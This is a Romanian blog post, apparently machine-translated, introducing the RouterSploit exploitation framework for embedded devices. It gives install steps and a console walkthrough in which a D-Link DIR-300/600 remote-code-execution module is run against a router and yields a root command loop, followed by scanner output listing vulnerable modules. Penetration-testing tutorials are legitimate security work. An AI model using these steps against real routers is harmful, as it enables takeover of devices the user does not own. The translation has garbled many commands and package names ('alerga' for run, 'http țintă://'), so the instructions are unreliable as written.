
RouterSploit este un cadru de exploatare uimitor creat special pentru dispozitivele încorporate.
Acest instrument poate fi folosit de pentester pentru a scana securitatea camerelor și a routerelor.
Repere RouterSploit:
- Codat în Python.
- Interfață de linie de comandă.
- Suport Docker.
- Instrumente modulare.
Sistem de operare acceptat:
- MacOS.
- Linux.
- Telefon Android.
- Ferestre.
Instalarea RouterSploit:
Cerințe:
- viitor
- cereri
- Paramic
- Stop
- pycrypto
Opțional:
- bluepy – bluetooth energie scăzută
Instalare în Kali Linux:
Urmați comenzile de mai jos:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Suport Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.pyInstalare în Ubuntu:
Urmați comenzile de mai jos:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Suport Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.pyInstalarea pe MacOS:
Urmați comenzile de mai jos:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.pySe instalează pe Docker:
Urmați comenzile de mai jos:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploitCum se actualizează RouterSploit?
Trebuie să actualizați frecvent RouterSploit pentru a evita inconvenientele.
Modulele noi sunt livrate aproape în fiecare zi.
cd routersploit
git pullCum se utilizează RouterSploit?
Utilizare
root@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ _| \____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Cadrul de exploatare pentru |_| de Threat9 Dispozitive încorporate Nume de cod : Știam că eşti problematic Versiune : 3.3.0 Pagina de pornire : https://www.threat9.com/ - @threatnine Alăturați-vă Slack : routersploit.slack.com Alăturați-vă programului Beta Threat9 - https://www.threat9.com/ Exploatările: 128 Scanere: 4 Creds: 165 Generic: 4 Sarcini utile: 32 Codificatoare: 6 rsf >
Exploatările:
Pentru a preforma Exploatarea, alegeți modulul și setați ținta:
rsf > folosește exploit-uri/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > utilizați exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Pentru finalizare, utilizați tasta Tab.
Pentru a afișa opțiuni, tipshow:
rsf (D-LINK DIR-300 & DIR-600 RCE) > afișează opțiuni Opțiuni de țintă: Nume Setări curente Descriere ---- ---------------- ----------- țintă Adresă țintă de ex. http://192.168.1.1 port 80 Port țintă
Utilizarerun sauexploit comanda pentru a exploata ținta:
rsf (D-LINK DIR-300 & DIR-600 RCE) > alerga [+] Ținta este vulnerabilă [*] Se invocă bucla de comandă... cmd > whoami rădăcină
Pentru a seta opțiuni:
rsf (D-LINK DIR-300 & DIR-600 RCE) > setați http țintă://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
Este posibil să verificați dacă ținta este vulnerabilă la o anumită exploatare:
rsf (D-LINK DIR-300 & DIR-600 RCE) > verifica [+] Ținta este vulnerabilă
Fugishow info pentru a afișa informații despre exploit.
Scanarea pentru ținte vulnerabile:
Scanerele permit verificarea rapidă dacă ținta este vulnerabilă la orice exploatare.
Utilizați aceleași comenzi pentru a afișa/seta opțiuni, și, de asemenea, să alerge.
rsf (Scaner D-Link) > alerga [+] exploits/dlink/dwr_932_info_disclosure este vulnerabil [-] exploits/dlink/dir_300_320_615_auth_bypass nu este vulnerabil [-] exploits/dlink/dsl_2750b_info_disclosure nu este vulnerabil [-] exploits/dlink/dns_320l_327l_rce nu este vulnerabil [-] exploits/dlink/dir_645_password_disclosure nu este vulnerabil [-] exploits/dlink/dir_300_600_615_info_disclosure nu este vulnerabil [-] exploits/dlink/dir_300_600_rce nu este vulnerabil [+] Dispozitivul este vulnerabil! - exploits/dlink/dwr_932_info_disclosure
Citește și: 1337x proxy
Cuvinte finale:
RouterSploit este un instrument uimitor de folosit.
Dacă vă confruntați cu probleme legate de RouterSploit. Asigurați-vă că comentați mai jos. Echipa noastră CSHAWK vă va contacta în cel mai scurt timp.